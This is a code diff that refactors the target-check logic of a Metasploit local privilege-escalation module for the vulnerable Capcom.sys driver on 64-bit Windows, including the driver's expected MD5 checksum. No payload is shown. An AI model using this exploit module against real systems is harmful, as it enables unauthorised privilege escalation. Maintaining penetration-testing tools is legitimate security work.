@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Local
           'Platform' => 'win',
           'SessionTypes' => [ 'meterpreter' ],
           'DefaultOptions' => {
-            'EXITFUNC' => 'thread',
+            'EXITFUNC' => 'thread'
           },
           'Targets' => [
             [ 'Windows x64 (<= 10)', { 'Arch' => ARCH_X64 } ]
@@ -60,7 +60,8 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    if sysinfo['OS'] !~ /windows (7|8|10)/i
+    version = get_version_info
+    if version.build_number < Msf::WindowsVersion::Win7_SP0 || version.windows_server?
       return Exploit::CheckCode::Unknown
     end
 
@@ -71,13 +72,13 @@ class MetasploitModule < Msf::Exploit::Local
     # Validate that the driver has been loaded and that
     # the version is the same as the one expected
     client.sys.config.getdrivers.each do |d|
-      if d[:basename].downcase == 'capcom.sys'
-        expected_checksum = '73c98438ac64a68e88b7b0afd11ba140'
-        target_checksum = client.fs.file.md5(d[:filename])
+      next unless d[:basename].downcase == 'capcom.sys'
 
-        if expected_checksum == Rex::Text.to_hex(target_checksum, '')
-          return Exploit::CheckCode::Appears
-        end
+      expected_checksum = '73c98438ac64a68e88b7b0afd11ba140'
+      target_checksum = client.fs.file.md5(d[:filename])
+
+      if expected_checksum == Rex::Text.to_hex(target_checksum, '')
+        return Exploit::CheckCode::Appears
       end
     end
 
